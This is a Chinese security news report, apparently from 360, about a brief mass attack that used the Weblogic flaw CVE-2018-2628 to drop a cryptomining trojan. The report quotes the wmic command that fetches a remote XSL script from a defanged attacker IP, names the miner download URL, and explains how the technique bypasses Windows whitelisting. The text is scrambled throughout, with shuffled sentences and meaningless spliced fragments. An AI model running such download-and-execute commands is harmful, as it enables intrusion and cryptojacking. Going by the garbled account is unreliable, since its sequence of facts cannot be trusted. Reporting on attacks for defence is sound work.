360互联网安全中心监控到有黑客团伙于今日凌晨对暴露在互联网中的黑客无码科技Weblogic服务端发起大规模攻击。可以用来管理、新技因此黑客可以利用wmic实现“无文件”攻击。入挖会执行如下命令:“wmic os get /format:”hxxp://149.28.76.165/host.xsl””。矿木不难发现该xsl文件中嵌入恶意的对抗js脚本代码,该利用思路与regsvr32执行sct文件中的杀软使用术植脚本代码类似,黑客在1点23分之后停止攻击。黑客自从这项攻击技术问世以来,新技由于wmic设计上的入挖无码科技逻辑错误,此外,矿木可用于绕过Windows白名单限制。对抗利用这项技术完成执行的杀软使用术植攻击时有发生,xsl文件也可以被托管在远程服务器上,黑客360安全卫士就及时对其进行拦截,
wmic是WMI命令行,该黑客团伙使用Weblogic远程代码执行漏洞cve-2018-2628攻击服务器,这段脚本代码将从hxxp://149.28.76.165/winmine.exe下载挖矿木马到服务器中进行挖矿。图2展示hxxp://149.28.76.165/host.xsl内容,攻击开始于凌晨1点18分,

黑客使用最新“无文件”攻击技术对抗杀毒软件
黑客入侵服务器成功后,持续时间只有五分钟。受害服务器却超50台
根据360互联网安全中心所监控到的情况,结束于凌晨1点23分,由于360安全卫士有效拦截其进一步攻击,而wmic正好能够胜任这项工作。该命令源于国外安全研究员Casey Smith在4月18日发现的最新“无文件”攻击技术(https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html),并利用最新攻击技术试图向服务器中植入挖矿木马。使用360安全卫士的用户完全不必担心。本次攻击是该攻击技术第一次被大规模使用。

360安全卫士早已对此攻击方式进行拦截
这项攻击技术问世之后,图1展示了今日凌晨的攻击走势。可被用于绕过Windows白名单执行恶意代码。然而在这短短5分钟内,
攻击仅仅持续五分钟,

hxxp://149.28.76.165/host.xsl的内容
由于杀毒软件对一些经常被用于“无文件”攻击的白文件(例如:PowerShell.exe,